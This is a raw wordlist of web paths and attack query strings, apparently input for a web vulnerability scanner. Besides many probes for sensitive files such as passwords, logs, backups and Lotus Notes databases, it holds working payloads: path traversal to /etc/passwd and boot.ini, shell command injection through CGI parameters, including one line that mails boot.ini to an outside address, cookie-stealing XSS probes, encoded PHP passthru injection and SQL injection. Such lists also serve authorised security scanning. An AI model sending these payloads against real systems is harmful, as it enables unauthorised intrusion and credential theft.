level/96/exec//show
level/97/exec//show
level/98/exec//show
level/99/exec//show
gallery/captionator.php
gallery/errors/configmode.php
gallery/errors/needinit.php
gallery/errors/reconfigure.php
gallery/errors/unconfigured.php
users.lst
WS_FTP.LOG
basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
examples/jsp/snp/snoop.jsp
nsn/env.bas
lcgi/lcgitest.nlm
com/
com/novell/
com/novell/webaccess
cgi-bin/
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
cgi-bin/ccbill-local.pl?cmd=MENU
cgi-bin/ccbill-local.cgi?cmd=MENU
cgi-bin/mastergate/search.cgi?search=0&search_on=all
cgi-bin/Backup/add-passwd.cgi
cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
cgi-bin/bslist.cgi?email=x;ls
cgi-bin/bsguest.cgi?email=x;ls
cgi-bin/nbmember.cgi?cmd=list_all_users
/admin/admin.shtml
axis-cgi/buffer/command.cgi
support/messages
cgi-bin/where.pl?sd=ls%20/etc
index.php?err=3&email=\"><script>alert(document.cookie)</script>
forgot_password.php?email=\"><script>alert(document.cookie)</script>
bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>
bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>
eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>
index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
cgi-bin/phf
cgi-bin/upload.cgi
upload.cgi+
server-status
?PageServices
?wp-cs-dump
cfdocs.map
publisher/
cgi-bin/nph-publish.cgi
cgi-bin/nph-test-cgi
cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
counter/1/n/n/0/3/5/0/a/123.gif
iissamples/exair/search/search.asp
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
../webserver.ini
na_admin/
cpqlogin.htm
main_page.php
cpanel/
shopexd.asp?catalogid='42
shopping/diag_dbtest.asp
_vti_bin/fpcount.exe/
forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
wwwboard/passwd.txt
login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
ows-bin/perlidlc.bat?&dir
photo/
photodata/
cgi-bin/photo/
iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
cgi-bin/include/new-visitor.inc.php
msadc/msadcs.dll
./../../../../../../../../../etc/*
./../../../../../../../../../etc/passw*
bytehoard/index.php?infolder=../../../../../../../../../../../etc/
Search
musicqueue.cgi
cgi-bin/musicqueue.cgi
scripts/tools/newdsn.exe
OpenFile.aspx?file=../../../../../../../../../../boot.ini
cgi-bin/windmail
cgi-bin/windmail.exe
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
index.php?vo=\"><script>alert(document.cookie);</script>
.../.../.../.../.../.../.../.../.../.../etc/passwd
cgi-bin/dose.pl?daily&somefile.txt&|ls|
admin/database/wwForum.mdb
../config.dat
iisadmpwd/aexp2.htr
iisadmpwd/aexp2b.htr
iisadmpwd/aexp3.htr
iisadmpwd/aexp4.htr
iisadmpwd/aexp4b.htr
/admin/aindex.htm
cgi-bin/gbadmin.cgi?action=change_adminpass
cgi-bin/gbadmin.cgi?action=change_automail
cgi-bin/gbadmin.cgi?action=colors
cgi-bin/gbadmin.cgi?action=setup
cgi-bin/gbpass.pl
shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
hopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>
admin/wg_user-info.ml
banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
c32web.exe/ChangeAdminPassword
showmail.pl
reademail.pl
showmail.pl?Folder=<script>alert(document.cookie)</script>
iissamples/exair/search/query.asp
index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]
index.php?offset=[%20Problem%20Here%20]
buddies.blt
buddy.blt
buddylist.blt
cgi-sys/addalink.cgi
cgi-sys/cgiecho
cgi-sys/cgiemail
cgi-sys/countedit
cgi-sys/domainredirect.cgi
cgi-sys/entropybanner.cgi
cgi-sys/entropysearch.cgi
cgi-sys/FormMail-clone.cgi
cgi-sys/helpdesk.cgi
cgi-sys/mchat.cgi
cgi-sys/randhtml.cgi
cgi-sys/realhelpdesk.cgi
cgi-sys/realsignup.cgi
cgi-sys/scgiwrap
cgi-sys/signup.cgi
pdf/
sqlnet.log
cgi-bin/GW5/GWWEB.EXE
.psql_history
acceso/
access-log
access.log
access/
access_log
acciones/
account/
accounting/
activex/
adm/
admin.htm
admin.php
admin.php3
admin.shtml
Administration/
administration/
administrator/
Admin_files/
advwebadmin/
Agent/
Agentes/
agentes/
Agents/
analog/
apache/
app/
applicattion/
applicattions/
apps/
archivar/
archive/
archives/
archivo/
asp/
Asp/
atc/
auth/
awebvisit.stat
ayuda/
backdoor/
backup/
bak/
banca/
banco/
bank/
bbv/
bdata/
bdatos/
beta/
bin/
boot/
buy/
buynow/
c/
cache-stats/
caja/
card/
cards/
cart/
cash/
ccard/
ccbill/secure/ccbill.log
cd/
cdrom/
cert/
certificado/
certificate
certificates
cfdocs/exampleapp/email/application.cfm
cfdocs/exampleapp/publish/admin/addcontent.cfm
cfdocs/exampleapp/publish/admin/application.cfm
cfdocs/examples/httpclient/mainframeset.cfm
cgi-bin/dbmlparser.exe
client/
cliente/
clientes/
clients/
cm/
code/
communicator/
compra/
compras/
compressed/
conecta/
config/checks.txt
connect/
console
correo/
counter/
credit/
crypto/
css
cuenta/
cuentas/
customers/
dan_o.dat
dat/
data/
dato/
datos/
db/
dbase/
demo/
demos/
dev/
devel/
development/
dir/
directory/
DMR/
doc-html/
down/
download/
downloads/
easylog/easylog.html
ejemplo/
ejemplos/
employees/
envia/
enviamail/
error_log
es/
excel/
Excel/
EXE/
exe/
fbsd/
file/
fileadmin/
files/
forum/
forums/
foto/
fotos/
fpadmin/
ftp/
gfx/
global/
graphics/
guest/
guestbook/
guests/
hidden/
hitmatic/
hitmatic/analyse.cgi
hits.txt
hit_tracker/
home/
homepage/
htdocs/
html/
htpasswd
HyperStat/stat_what.log
hyperstat/stat_what.log
ibill/
idea/
ideas/
imagenes/
img/
imgs/
import/
impreso/
includes/
incoming/
info/
informacion/
information/
ingresa/
ingreso/
install/
internal/
intranet/
invitado/
invitados/
java-plugin/
java/
jdbc/
job/
jrun/
js
lib/
library/
libro/
linux/
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logfile/
logfiles/
logger.html
logger/
logging/
login/
logs.txt
logs/
logs/access_log
logs/error_log
lost+found/
mail/
manage/cgi/cgiproc
marketing/
master.password
mbox
members/
message/
messaging/
ministats/admin.cgi
misc/
mkstats/
movimientos/
mp3/
mqseries/
msql/
msword/
Msword/
MSword/
NetDynamic/
NetDynamics/
netscape/
new
new/
news
nl/
noticias/
odbc/
officescan/cgi/jdkRqNotify.exe
old/
oracle
oradata/
order/
orders/
orders/checks.txt
orders/mountain.cfg
orders/orders.log
orders/orders.txt
outgoing/
ows/
pages/
Pages/
passwd
passwd.adjunct
passwd.txt
passwdfile
password
password/
passwords.txt
passwords/
PDG_Cart/
people.list
perl5/
php/
phpmyadmin/
phpMyAdmin/
pics/
piranha/secure/passwd.php3
pix/
poll
polls
porn/
pr0n/
privado/
private/
prod/
pron/
prueba/
pruebas/
pub/
public/
publica/
publicar/
publico/
purchase/
purchases/
pw/
pwd.db
python/
readme
README.TXT
readme.txt
register/
registered/
reports/
reseller/
restricted/
retail/
reviews/newpro.cgi
root/
sales/
sample/
samples/
save/
scr/
scratch
scripts/weblog
search.vts
search97.vts
secret/
secure/
secured/
sell/
server_stats/
service/
services/
servicio/
servicios/
setup/
shop/
shopper/
software/
solaris/
source/
Sources/
spwd
sql/
src/
srchadm
ss.cfg
ssi/
staff/
stat.htm
stat/
statistic/
Statistics/
statistics/
stats.htm
stats.html
stats.txt
stats/
Stats/
status/
store/
StoreDB/
stylesheet/
stylesheets/
subir/
sun/
super_stats/access_logs
super_stats/error_logs
support/
swf
sys/
system/
tar/
tarjetas/
temp/
template/
temporal/
test.htm
test.html
test.txt
test/
testing/
tests/
tmp/
tools/
tpv/
trabajo/
trafficlog/
transito/
tree/
trees/
updates/
user/
users/
users/scripts/submit.cgi
ustats/
usuario/
usuarios/
vfs/
w3perl/admin
warez/
web800fo/
webaccess.htm
webaccess/access-options.txt
webadmin/
webboard/
webcart-lite/
webcart/
webdata/
weblog/
weblogs/
webmaster_logs/
WebShop/
WebShop/logs/cc.txt
WebShop/templates/cc.txt
website/
webstats/
WebTrend/
Web_store/
windows/
word/
work/
wstats/
wusage/
www-sql/
www/
wwwboard/wwwboard.cgi
wwwboard/wwwboard.pl
wwwjoin/
wwwlog/
wwwstats.html
wwwstats/
wwwthreads/3tvars.pm
wwwthreads/w3tvars.pm
zipfiles/
_pages
cgi-bin/.fhp
cgi-bin/add_ftp.cgi
cgi-bin/admin.cgi
cgi-bin/admin.php
cgi-bin/admin.php3
cgi-bin/admin.pl
cgi-bin/adminhot.cgi
cgi-bin/adminwww.cgi
cgi-bin/AnyBoard.cgi
cgi-bin/AnyForm
cgi-bin/AnyForm2
cgi-bin/ash
cgi-bin/ax-admin.cgi
cgi-bin/ax.cgi
cgi-bin/axs.cgi
cgi-bin/bash
cgi-bin/bnbform
cgi-bin/bnbform.cgi
cgi-bin/cart.pl
cgi-bin/cgimail.exe
cgi-bin/classifieds
cgi-bin/classifieds.cgi
cgi-bin/clickcount.pl?view=test
cgi-bin/code.php
cgi-bin/code.php3
cgi-bin/count.cgi
cgi-bin/csh
cgi-bin/cstat.pl
cgi-bin/c_download.cgi
cgi-bin/dasp/fm_shell.asp
cgi-bin/day5datacopier.cgi
cgi-bin/dfire.cgi
cgi-bin/dig.cgi
cgi-bin/displayTC.pl
cgi-bin/edit.pl
cgi-bin/enter.cgi
cgi-bin/environ.cgi
cgi-bin/environ.pl
cgi-bin/ex-logger.pl
cgi-bin/excite
cgi-bin/filemail
cgi-bin/filemail.pl
cgi-bin/ftp.pl
cgi-bin/ftpsh
cgi-bin/getdoc.cgi
cgi-bin/glimpse
cgi-bin/hitview.cgi
cgi-bin/jailshell
cgi-bin/jj
cgi-bin/ksh
cgi-bin/log-reader.cgi
cgi-bin/log/
cgi-bin/login.cgi
cgi-bin/login.pl
cgi-bin/logit.cgi
cgi-bin/logs.pl
cgi-bin/logs/
cgi-bin/logs/access_log
cgi-bin/logs/error_log
cgi-bin/lookwho.cgi
cgi-bin/maillist.cgi
cgi-bin/maillist.pl
cgi-bin/man.sh
cgi-bin/meta.pl
cgi-bin/minimal.exe
cgi-bin/nlog-smb.cgi
cgi-bin/nlog-smb.pl
cgi-bin/noshell
cgi-bin/nph-publish
cgi-bin/ntitar.pl
cgi-bin/pass
cgi-bin/passwd
cgi-bin/passwd.txt
cgi-bin/password
cgi-bin/post_query
cgi-bin/pu3.pl
cgi-bin/ratlog.cgi
cgi-bin/responder.cgi
cgi-bin/rguest.exe
cgi-bin/rksh
cgi-bin/rsh
cgi-bin/search.cgi
cgi-bin/search.pl
cgi-bin/session/adminlogin
cgi-bin/sh
cgi-bin/show.pl
cgi-bin/stat/
cgi-bin/stats-bin-p/reports/index.html
cgi-bin/stats.pl
cgi-bin/stats.prf
cgi-bin/stats/
cgi-bin/statsconfig
cgi-bin/stats_old/
cgi-bin/statview.pl
cgi-bin/survey
cgi-bin/survey.cgi
cgi-bin/tablebuild.pl
cgi-bin/tcsh
cgi-bin/test.cgi
cgi-bin/test/test.cgi
cgi-bin/textcounter.pl
cgi-bin/tidfinder.cgi
cgi-bin/tigvote.cgi
cgi-bin/tpgnrock
cgi-bin/ultraboard.cgi
cgi-bin/ultraboard.pl
cgi-bin/viewlogs.pl
cgi-bin/visitor.exe
cgi-bin/w3-msql
cgi-bin/w3-sql
cgi-bin/webais
cgi-bin/webbbs.cgi
cgi-bin/webbbs.exe
cgi-bin/webutil.pl
cgi-bin/webutils.pl
cgi-bin/webwho.pl
cgi-bin/wguest.exe
cgi-bin/www-sql
cgi-bin/wwwboard.cgi.cgi
cgi-bin/wwwboard.pl
cgi-bin/wwwstats.pl
cgi-bin/wwwthreads/3tvars.pm
cgi-bin/wwwthreads/w3tvars.pm
cgi-bin/zsh
adsamples/config/site.csc
advworks/equipment/catalog_type.asp
carbo.dll
clocktower/
localstart.asp
market/
mspress30/
sam
sam.bin
sam._
samples/search/queryhit.htm
scripts/counter.exe
scripts/cphost.dll
scripts/fpadmcgi.exe
scripts/postinfo.asp
scripts/samples/ctguestb.idc
scripts/samples/search/webhits.exe
site/iissamples/
vc30/
_mem_bin/
_mem_bin/FormsLogin.asp
perl/files.pl
perl5/files.pl
scripts/convert.bas
owa_util%2esignature
cgi-dos/args.bat
custdata/
hostingcontroller/
data.sql
databases/
databse.sql
db.sql
etc/passwd
img-sys/
java-sys/
javadoc/
log/
manager/
manual/
exchange/
pls/admin
account.nsf
accounts.nsf
admin.nsf
admin4.nsf
admin5.nsf
agentrunner.nsf
alog.nsf
archive/a_domlog.nsf
archive/l_domlog.nsf
a_domlog.nsf
billing.nsf
bookmark.nsf
books.nsf
busytime.nsf
calendar.nsf
certa.nsf
certlog.nsf
certsrv.nsf
chatlog.nsf
clbusy.nsf
cldbdir.nsf
clusta4.nsf
collect4.nsf
cpa.nsf
customerdata.nsf
da.nsf
database.nsf
db.nsf
dclf.nsf
DEASAppDesign.nsf
DEASLog.nsf
DEASLog01.nsf
DEASLog02.nsf
DEASLog03.nsf
DEASLog04.nsf
DEASLog05.nsf
decsadm.nsf
decsdoc.nsf
decslog.nsf
DEESAdmin.nsf
default.nsf
dirassist.nsf
doladmin.nsf
dols_help.nsf
domadmin.nsf
domcfg.nsf
event.nsf
events.nsf
events5.nsf
group.nsf
groups.nsf
help5_admin.nsf
help5_client.nsf
help5_designer.nsf
homepage.nsf
iNotes/Forms5.nsf
iNotes/Forms5.nsf/$DefaultNav
jotter.nsf
kbccv11.nsf
kbnv11.nsf
kbssvv11.nsf
lcon.nsf
ldap.nsf
leiadm.nsf
leilog.nsf
leivlt.nsf
log4a.nsf
lsxlc.nsf
l_domlog.nsf
mab.nsf
mail/adminisist.nsf
mail1.box
mail10.box
mail2.box
mail3.box
mail4.box
mail5.box
mail6.box
mail7.box
mail8.box
mail9.box
mailw46.nsf
msdwda.nsf
mtatbls.nsf
mtdata/mtstore.nsf
mtstore.nsf
nntp/nd000000.nsf
nntp/nd000001.nsf
nntp/nd000002.nsf
nntp/nd000003.nsf
nntp/nd000004.nsf
nntppost.nsf
notes.nsf
ntsync4.nsf
ntsync45.nsf
perweb.nsf
private.nsf
public.nsf
qpadmin.nsf
quickplace/quickplace/main.nsf
quickstart/qstart50.nsf
quickstart/wwsample.nsf
readme.nsf
reports.nsf
sample/faqw46
sample/framew46
sample/pagesw46
sample/siregw46
sample/site1w4646
sample/site2w4646
sample/site3w4646
schema50.nsf
secret.nsf
setupweb.nsf
smbcfg.nsf
smconf.nsf
smency.nsf
smmsg.nsf
smquar.nsf
smsolar.nsf
smtime.nsf
smtp.box
smtp.nsf
smtpibwq.nsf
smtpobwq.nsf
smtptbls.nsf
smvlog.nsf
software.nsf
srvnam.htm
statmail.nsf
stauths.nsf
stautht.nsf
stconf.nsf
stconfig.nsf
stdnaset.nsf
stdomino.nsf
stlog.nsf
streg.nsf
stsrc.nsf
test.nsf
today.nsf
userreg.nsf
users.nsf
vpuserinfo.nsf
web.nsf
webuser.nsf
welcome.nsf
wksinst.nsf
finance.xls
finances.xls
abonnement.asp
acartpath/signin.asp?|-|0|404_Object_Not_Found
add_acl
admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]
admin/auth.php
admin/cfg/configscreen.inc.php+
admin/cfg/configsite.inc.php+
admin/cfg/configsql.inc.php+
admin/cfg/configtache.inc.php+
admin/cms/htmltags.php
admin/credit_card_info.php
admin/exec.php3
admin/index.php
admin/modules/cache.php+
admin/objects.inc.php4
admin/script.php
admin/settings.inc.php+
admin/templates/header.php
admin/upload.php
admin_t/include/aff_liste_langue.php
adv/gm001-mc/
aff_news.php
approval/ts_app.htm
archive.asp
archive_forum.asp
ashnews.php
auth.inc.php
b2-tools/gm-2-b2.php
bandwidth/index.cgi
basilix.php3
bigsam_guestbook.php?displayBegin=9999...9999
bin/common/user_update_passwd.pl
biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
board/index.php
board/philboard_admin.asp+
boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
bugtest+/+
caupo/admin/admin_workspace.php
ccbill/whereami.cgi
chat_dir/register.php
checkout_payment.php
communique.asp
community/forumdisplay.php
community/index.php?analized=anything
community/member.php
compte.php
config/html/cnf_gi.htm
convert-date.php
cp/rac/nsManager.cgi
CSNews.cgi
csPassword.cgi?command=remove%20
cutenews/comments.php
cutenews/search.php
cutenews/shownews.php
Data/settings.xml+
database/metacart.mdb+
db.php
dbabble
dcp/advertiser.php
defines.php
dltclnt.php
doc/admin/index.php
docs/NED
dotproject/modules/files/index_table.php
dotproject/modules/projects/addedit.php
dotproject/modules/projects/view.php
dotproject/modules/projects/vw_files.php
dotproject/modules/tasks/addedit.php
dotproject/modules/tasks/viewgantt.php
do_map
do_subscribe
email.php
emml_email_func.php
emumail.cgi?type=.%00
entete.php
enteteacceuil.php
etc/shadow+
eventcal2.php.php
ez2000/ezadmin.cgi
ez2000/ezboard.cgi
ez2000/ezman.cgi
faqman/index.php
filemanager/index.php3
filemgmt/brokenfile.php
filemgmt/singlefile.php
filemgmt/viewcat.php
filemgmt/visit.php
foro/YaBB.pl
forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd
forum-ra.asp?n=../../../../../../../../../etc/passwd
forum-ra.asp?n=../../../../../../../../../etc/passwd%00
forum-ra.asp?n=/../../../../../../../../../../../boot.ini
forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum-ra.asp?n=/etc/passwd
forum-ra.asp?n=/etc/passwd%00
forum-ra.asp?n=c:\boot.ini
forum-ra_professionnel.asp?n=%60/etc/passwd%60
forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00
forum-ra_professionnel.asp?n=../../boot.ini
forum-ra_professionnel.asp?n=/....../boot.ini
forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum-ra_professionnel.asp?n=/../../../../../../etc/passwd
forum-ra_professionnel.asp?n=/../../../etc/passwd
forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum-ra_professionnel.asp?n=/etc/passwd
forum-ra_professionnel.asp?n=/etc/passwd%00
forum-ra_professionnel.asp?n=c:\boot.ini
forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forum/mainfile.php
forum/member.php
forum/newreply.php
forum/newthread.php
forum/viewtopic.php
forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_cu
forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=1753&amp;nn=%60/etc/passwd%60
forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd
forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd
forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00
forum1.asp?n=1753&amp;nn=/....../boot.ini
forum1.asp?n=1753&amp;nn=/..../boot.ini
forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum1.asp?n=1753&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum1.asp?n=1753&amp;nn=/etc/passwd
forum1.asp?n=1753&amp;nn=/etc/passwd%00
forum1.asp?n=1753&amp;nn=c:\boot.ini
forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requi
forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren
forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_recor
forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requeste
